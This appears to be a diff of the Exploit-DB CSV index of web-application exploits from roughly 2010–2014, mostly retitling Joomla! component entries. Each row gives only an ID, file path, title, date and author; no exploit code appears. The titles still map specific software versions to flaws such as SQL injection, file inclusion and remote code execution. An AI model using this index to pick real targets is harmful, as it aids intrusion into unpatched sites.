14648,platforms/php/webapps/14648.txt,"Guestbook Script PHP - Cross-Site Scripting / HTML Injection",2010-08-15,"AnTi SeCuRe",php,webapps,0
|
||||
14650,platforms/php/webapps/14650.html,"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-15,10n1z3d,php,webapps,0
|
||||
14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution",2010-08-15,BlackHawk,php,webapps,0
|
||||
14655,platforms/php/webapps/14655.txt,"Joomla! Component 'com_equipment' - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
|
||||
14655,platforms/php/webapps/14655.txt,"Joomla! Component com_equipment - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0
|
||||
14656,platforms/php/webapps/14656.txt,"Joomla! Component 'com_jgrid' 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0
|
||||
14659,platforms/php/webapps/14659.txt,"Joomla! Component 'com_ongallery' - SQL Injection",2010-08-16,"al bayraqim",php,webapps,0
|
||||
14672,platforms/php/webapps/14672.txt,"Free Simple Software 1.0 - Remote File Inclusion",2010-08-17,Dr.$audi,php,webapps,0
|
||||
14684,platforms/php/webapps/14684.php,"Open-Realty 2.5.7 - Local File Disclosure",2010-08-18,"Nikola Petrov",php,webapps,0
|
||||
14686,platforms/php/webapps/14686.txt,"vbbuletin 4.0.4 - Multiple Vulnerabilities",2010-08-19,mc2_s3lector,php,webapps,0
|
||||
14707,platforms/php/webapps/14707.txt,"Joomla! Component 'com_Fabrik' - SQL Injection",2010-08-21,Mkr0x,php,webapps,0
|
||||
14694,platforms/php/webapps/14694.txt,"Joomla! Component 'com_extcalendar' - Blind SQL Injection",2010-08-20,Lagripe-Dz,php,webapps,0
|
||||
14707,platforms/php/webapps/14707.txt,"Joomla! Component Fabrik - SQL Injection",2010-08-21,Mkr0x,php,webapps,0
|
||||
14694,platforms/php/webapps/14694.txt,"Joomla! Component com_extcalendar - Blind SQL Injection",2010-08-20,Lagripe-Dz,php,webapps,0
|
||||
14702,platforms/php/webapps/14702.txt,"Joomla! Component 'com_zina' - SQL Injection",2010-08-21,"Th3 RDX",php,webapps,0
|
||||
14703,platforms/php/webapps/14703.txt,"Joomla! Component Biblioteca 1.0 Beta - Multiple SQL Injections",2010-08-21,"Salvatore Fresta",php,webapps,0
|
||||
14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script - SQL Injection",2010-08-21,"Br0wn Sug4r",asp,webapps,0
|
||||
|
|
@ -24006,7 +24007,7 @@ id,file,description,date,author,platform,type,port
|
|||
15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps,0
|
||||
15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' Parameter SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0
|
||||
15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps,0
|
||||
15162,platforms/php/webapps/15162.rb,"Joomla! Component 'com_jejob' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
|
||||
15162,platforms/php/webapps/15162.rb,"Joomla! Component JE Job - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
|
||||
15163,platforms/php/webapps/15163.rb,"Joomla! Component JE Directory 1.0 - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
|
||||
15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",php,webapps,0
|
||||
15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0
|
||||
|
|
@ -24100,7 +24101,7 @@ id,file,description,date,author,platform,type,port
|
|||
15348,platforms/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,php,webapps,0
|
||||
15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - overview.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
|
||||
15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - game.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
|
||||
15353,platforms/php/webapps/15353.txt,"Joomla! Component 'com_jfuploader' < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0
|
||||
15353,platforms/php/webapps/15353.txt,"Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0
|
||||
15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 / 0.2 - 'FCKeditor' Arbitrary File Upload",2010-10-30,Net.Edit0r,php,webapps,0
|
||||
15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0
|
||||
15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0
|
||||
|
|
@ -24133,25 +24134,25 @@ id,file,description,date,author,platform,type,port
|
|||
15415,platforms/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection",2010-11-04,"High-Tech Bridge SA",php,webapps,0
|
||||
15416,platforms/php/webapps/15416.txt,"JBI CMS - SQL Injection",2010-11-04,Cru3l.b0y,php,webapps,0
|
||||
15430,platforms/php/webapps/15430.txt,"Joomla! Component ccInvoices - SQL Injection",2010-11-05,FL0RiX,php,webapps,0
|
||||
15439,platforms/php/webapps/15439.txt,"Joomla! Component 'com_connect' - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
|
||||
15440,platforms/php/webapps/15440.txt,"Joomla! Component 'com_dcnews' - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
|
||||
15439,platforms/php/webapps/15439.txt,"Joomla! Component com_connect - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
|
||||
15440,platforms/php/webapps/15440.txt,"Joomla! Component com_dcnews - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
|
||||
15441,platforms/php/webapps/15441.txt,"MassMirror Uploader - Remote File Inclusion",2010-11-06,ViciOuS,php,webapps,0
|
||||
15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion",2010-11-06,ViRuS_HiMa,php,webapps,0
|
||||
15448,platforms/asp/webapps/15448.txt,"ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
|
||||
15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
|
||||
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
|
||||
15453,platforms/php/webapps/15453.txt,"Joomla! Component Cookex Agency CKForms - Local File Inclusion",2010-11-08,ALTBTA,php,webapps,0
|
||||
15454,platforms/php/webapps/15454.txt,"Joomla! Component 'com_clan' - SQL Injection",2010-11-08,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
15454,platforms/php/webapps/15454.txt,"Joomla! Component com_clan - SQL Injection",2010-11-08,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 / 4 - 'FCKeditor' Arbitrary File Upload",2010-11-08,Net.Edit0r,php,webapps,0
|
||||
15456,platforms/php/webapps/15456.txt,"Joomla! Component 'com_clanlist' - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0
|
||||
15456,platforms/php/webapps/15456.txt,"Joomla! Component com_clanlist - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0
|
||||
15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0
|
||||
15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0
|
||||
15460,platforms/php/webapps/15460.txt,"Joomla! Component ProDesk 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0
|
||||
15466,platforms/php/webapps/15466.txt,"Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0
|
||||
15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection",2010-11-09,"Easy Laster",php,webapps,0
|
||||
15468,platforms/php/webapps/15468.txt,"Joomla! Component btg_oglas - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps,0
|
||||
15469,platforms/php/webapps/15469.txt,"Joomla! Component 'com_markt' - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
|
||||
15470,platforms/php/webapps/15470.txt,"Joomla! Component 'com_img' - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps,0
|
||||
15469,platforms/php/webapps/15469.txt,"Joomla! Component com_markt - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
|
||||
15470,platforms/php/webapps/15470.txt,"Joomla! Component com_img - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps,0
|
||||
15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x 2.4.3 - (FileManager upload.php) Arbitrary File Upload",2010-11-10,grabz,php,webapps,0
|
||||
15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - Cross-Site Request Forgery",2010-11-09,daandeveloper33,php,webapps,0
|
||||
15473,platforms/multiple/webapps/15473.html,"IBM OmniFind - Cross-Site Request Forgery",2010-11-09,"Fatih Kilic",multiple,webapps,0
|
||||
|
|
@ -24172,7 +24173,7 @@ id,file,description,date,author,platform,type,port
|
|||
15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0
|
||||
15516,platforms/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,php,webapps,0
|
||||
15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0
|
||||
15518,platforms/php/webapps/15518.txt,"Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
|
||||
15518,platforms/php/webapps/15518.txt,"Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
|
||||
15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0
|
||||
15524,platforms/php/webapps/15524.txt,"Pre ADS Portal - Authentication Bypass",2010-11-13,Cru3l.b0y,php,webapps,0
|
||||
15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,php,webapps,0
|
||||
|
|
@ -24186,7 +24187,7 @@ id,file,description,date,author,platform,type,port
|
|||
15549,platforms/php/webapps/15549.txt,"Joomla! Component com_alfurqan15x - SQL Injection",2010-11-15,kaMtiEz,php,webapps,0
|
||||
15553,platforms/asp/webapps/15553.txt,"BPConferenceReporting Web Reporting - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0
|
||||
15554,platforms/asp/webapps/15554.txt,"BPRealestate Real Estate - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0
|
||||
15555,platforms/php/webapps/15555.txt,"Joomla! Component 'com_maianmedia' - SQL Injection",2010-11-16,v3n0m,php,webapps,0
|
||||
15555,platforms/php/webapps/15555.txt,"Joomla! Component com_maianmedia - SQL Injection",2010-11-16,v3n0m,php,webapps,0
|
||||
15557,platforms/php/webapps/15557.txt,"openEngine 2.0 100226 - Local File Inclusion / Cross-Site Scripting",2010-11-16,"SecPod Research",php,webapps,0
|
||||
15559,platforms/php/webapps/15559.txt,"IceBB 1.0-rc10 - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0
|
||||
15560,platforms/php/webapps/15560.txt,"ClanSphere 2010.0 Final - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0
|
||||
|
|
@ -24325,7 +24326,7 @@ id,file,description,date,author,platform,type,port
|
|||
15824,platforms/php/webapps/15824.txt,"Pligg CMS 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0
|
||||
15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0
|
||||
15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",php,webapps,0
|
||||
15827,platforms/php/webapps/15827.txt,"Joomla! Component 'com_idoblog' - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
|
||||
15827,platforms/php/webapps/15827.txt,"Joomla! Component com_idoblog - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
|
||||
15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,php,webapps,0
|
||||
15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on FrontPage",2010-12-28,"Michael Brooks",php,webapps,0
|
||||
15830,platforms/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) - Arbitrary File Upload",2010-12-25,MyDoom,php,webapps,0
|
||||
|
|
@ -24386,14 +24387,14 @@ id,file,description,date,author,platform,type,port
|
|||
15979,platforms/php/webapps/15979.txt,"Joomla! - Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0
|
||||
15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0
|
||||
16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0
|
||||
15989,platforms/php/webapps/15989.txt,"Joomla! Component 'com_people' 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
|
||||
15989,platforms/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
|
||||
15993,platforms/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0
|
||||
15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps,0
|
||||
15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
|
||||
15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,jsp,webapps,0
|
||||
15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0
|
||||
16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",2011-01-16,"Mark Stanislav",php,webapps,0
|
||||
16001,platforms/php/webapps/16001.txt,"Joomla! Component 'com_people' 1.0.0 - Local File Inclusion",2011-01-16,ALTBTA,php,webapps,0
|
||||
16001,platforms/php/webapps/16001.txt,"Joomla! Component com_people 1.0.0 - Local File Inclusion",2011-01-16,ALTBTA,php,webapps,0
|
||||
16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 - (cart.php) Blind SQL Injection",2011-01-16,ShivX,php,webapps,0
|
||||
16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon - SQL Injection",2011-01-17,Saif,php,webapps,0
|
||||
16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0
|
||||
|
|
@ -24645,7 +24646,7 @@ id,file,description,date,author,platform,type,port
|
|||
17132,platforms/php/webapps/17132.py,"Joomla! Component 'com_virtuemart' 1.1.7 - Blind SQL Injection",2011-04-08,"TecR0c and mr_me",php,webapps,0
|
||||
17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
|
||||
17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
|
||||
17136,platforms/php/webapps/17136.txt,"Joomla! Component 'com_jce' - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps,0
|
||||
17136,platforms/php/webapps/17136.txt,"Joomla! Component joomlacontenteditor - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps,0
|
||||
17137,platforms/php/webapps/17137.txt,"Nooms CMS 1.1.1 - Cross-Site Request Forgery",2011-04-09,loneferret,php,webapps,0
|
||||
17178,platforms/php/webapps/17178.txt,"Blue Hat - Sensitive Database Disclosure / SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0
|
||||
17179,platforms/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0
|
||||
|
|
@ -24696,7 +24697,7 @@ id,file,description,date,author,platform,type,port
|
|||
17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - Cross-Site Request Forgery",2011-05-06,"High-Tech Bridge SA",php,webapps,0
|
||||
17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal",2011-05-07,"Raffaele Forte",cgi,webapps,0
|
||||
17264,platforms/php/webapps/17264.txt,"Joomla! Component 'com_versioning' - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
|
||||
17265,platforms/php/webapps/17265.txt,"Joomla! Component 'com_hello' - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
|
||||
17265,platforms/php/webapps/17265.txt,"Joomla! Component com_hello - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
|
||||
17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection",2011-05-10,ScOrPiOn,php,webapps,0
|
||||
17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server - Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0
|
||||
17284,platforms/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
|
||||
|
|
@ -24710,7 +24711,7 @@ id,file,description,date,author,platform,type,port
|
|||
17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 - Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0
|
||||
17299,platforms/php/webapps/17299.txt,"WordPress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0
|
||||
17301,platforms/php/webapps/17301.txt,"Pligg CMS 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0
|
||||
17303,platforms/php/webapps/17303.txt,"Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
|
||||
17303,platforms/php/webapps/17303.txt,"Joomla! Component jDownloads 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
|
||||
17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 - Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0
|
||||
17308,platforms/php/webapps/17308.txt,"Zen Cart 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0
|
||||
17309,platforms/php/webapps/17309.txt,"PHP Captcha / Securimage 2.0.2 - Authentication Bypass",2011-05-20,"Sense of Security",php,webapps,0
|
||||
|
|
@ -24814,7 +24815,7 @@ id,file,description,date,author,platform,type,port
|
|||
17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,php,webapps,0
|
||||
17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",jsp,webapps,0
|
||||
17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0
|
||||
17556,platforms/php/webapps/17556.txt,"Joomla! Component 'com_jesubmit' - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
|
||||
17556,platforms/php/webapps/17556.txt,"Joomla! Component JE Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
|
||||
17560,platforms/php/webapps/17560.txt,"Joomla! Component 'mod_spo' - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0
|
||||
17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
|
||||
17574,platforms/jsp/webapps/17574.php,"CA ARCserve D2D r15 GWT RPC - Multiple Vulnerabilities",2011-07-26,rgod,jsp,webapps,0
|
||||
|
|
@ -24828,14 +24829,14 @@ id,file,description,date,author,platform,type,port
|
|||
17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0
|
||||
17587,platforms/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0
|
||||
17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 - (register_form()) Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0
|
||||
17591,platforms/php/webapps/17591.txt,"Joomla! Component 'com_obSuggest' - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0
|
||||
17591,platforms/php/webapps/17591.txt,"Joomla! Component obSuggest - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0
|
||||
17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,php,webapps,0
|
||||
17593,platforms/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,php,webapps,0
|
||||
17595,platforms/php/webapps/17595.txt,"MyBB MyTabs Plugin - SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
|
||||
17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC - Credential Information Disclosure (Metasploit)",2011-08-01,Metasploit,jsp,webapps,0
|
||||
17597,platforms/php/webapps/17597.txt,"SiteGenius - Blind SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
|
||||
17602,platforms/php/webapps/17602.txt,"WordPress Plugin TimThumb 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
|
||||
17603,platforms/php/webapps/17603.txt,"Joomla! Component 'com_jdirectory' - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0
|
||||
17603,platforms/php/webapps/17603.txt,"Joomla! Component com_jdirectory - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0
|
||||
17606,platforms/multiple/webapps/17606.txt,"DZYGroup CMS Portal - Multiple SQL Injections",2011-08-04,Netrondoank,multiple,webapps,0
|
||||
17613,platforms/php/webapps/17613.php,"WordPress Plugin E-Commerce 3.8.4 - SQL Injection",2011-08-05,IHTeam,php,webapps,0
|
||||
17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server - Authenticated Code Execution (Metasploit)",2011-08-05,Metasploit,jsp,webapps,0
|
||||
|
|
@ -24852,7 +24853,7 @@ id,file,description,date,author,platform,type,port
|
|||
17640,platforms/php/webapps/17640.txt,"BlogPHP 2.0 - Persistent Cross-Site Scripting",2011-08-09,Paulzz,php,webapps,0
|
||||
17641,platforms/php/webapps/17641.txt,"LaserNet CMS 1.5 - SQL Injection (1)",2011-08-09,p0pc0rn,php,webapps,0
|
||||
17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (2)",2011-08-09,pentesters.ir,php,webapps,0
|
||||
17646,platforms/php/webapps/17646.txt,"Joomla! Component 'com_esearch' - SQL Injection",2011-08-09,NoGe,php,webapps,0
|
||||
17646,platforms/php/webapps/17646.txt,"Joomla! Component Search 3.0.0 - SQL Injection",2011-08-09,NoGe,php,webapps,0
|
||||
17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0
|
||||
17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 - Cross-Site Request Forgery",2011-08-14,"Smith Falcon",php,webapps,0
|
||||
17660,platforms/php/webapps/17660.txt,"VideoDB 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps,0
|
||||
|
|
@ -24860,7 +24861,7 @@ id,file,description,date,author,platform,type,port
|
|||
17662,platforms/php/webapps/17662.txt,"Mambo 4.6.x < 4.6.5 - SQL Injection",2011-08-13,"Aung Khant",php,webapps,0
|
||||
17667,platforms/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0
|
||||
17673,platforms/php/webapps/17673.txt,"WordPress Plugin IP-Logger 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0
|
||||
17674,platforms/php/webapps/17674.txt,"Joomla! Component 'com_joomtouch' - Local File Inclusion",2011-08-17,NoGe,php,webapps,0
|
||||
17674,platforms/php/webapps/17674.txt,"Joomla! Component JoomTouch 1.0.2 - Local File Inclusion",2011-08-17,NoGe,php,webapps,0
|
||||
17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0
|
||||
17677,platforms/php/webapps/17677.txt,"WordPress Plugin File Groups 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
|
||||
17678,platforms/php/webapps/17678.txt,"WordPress Plugin Contus HD FLV Player 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
|
||||
|
|
@ -24900,7 +24901,7 @@ id,file,description,date,author,platform,type,port
|
|||
17730,platforms/php/webapps/17730.txt,"WordPress Plugin oQey Headers 0.3 - SQL Injection",2011-08-27,"Miroslav Stampar",php,webapps,0
|
||||
17731,platforms/php/webapps/17731.txt,"WordPress Plugin Photoracer 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0
|
||||
17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro 1.1.0 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,asp,webapps,0
|
||||
17734,platforms/php/webapps/17734.txt,"Joomla! Component 'com_jce' 2.0.10 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,php,webapps,0
|
||||
17734,platforms/php/webapps/17734.txt,"Joomla! Component joomlacontenteditor 2.0.10 - Multiple Vulnerabilities",2011-08-28,AmnPardaz,php,webapps,0
|
||||
17736,platforms/php/webapps/17736.txt,"Joomla! Component 'mod_simpleFileLister' 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps,0
|
||||
17737,platforms/php/webapps/17737.txt,"WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
|
||||
17738,platforms/php/webapps/17738.txt,"WordPress Plugin Evarisk 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
|
||||
|
|
@ -33200,7 +33201,7 @@ id,file,description,date,author,platform,type,port
|
|||
34015,platforms/php/webapps/34015.txt,"SoftDirec 1.05 - 'delete_confirm.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0
|
||||
34016,platforms/php/webapps/34016.txt,"Snipe Gallery 3.1 - gallery.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
34017,platforms/php/webapps/34017.txt,"Snipe Gallery 3.1 - image.php cfg_admin_path Parameter Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
34021,platforms/php/webapps/34021.txt,"Joomla! Component 'com_horses' - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0
|
||||
34021,platforms/php/webapps/34021.txt,"Joomla! Component com_horses - 'id' Parameter SQL Injection",2010-05-19,"Kernel Security Group",php,webapps,0
|
||||
34022,platforms/php/webapps/34022.txt,"StivaSoft Stiva SHOPPING CART 1.0 - 'demo.php' Cross-Site Scripting",2010-01-13,PaL-D3v1L,php,webapps,0
|
||||
34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0
|
||||
34024,platforms/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,ViRuSMaN,php,webapps,0
|
||||
|
|
@ -33280,7 +33281,7 @@ id,file,description,date,author,platform,type,port
|
|||
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
|
||||
34161,platforms/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",php,webapps,80
|
||||
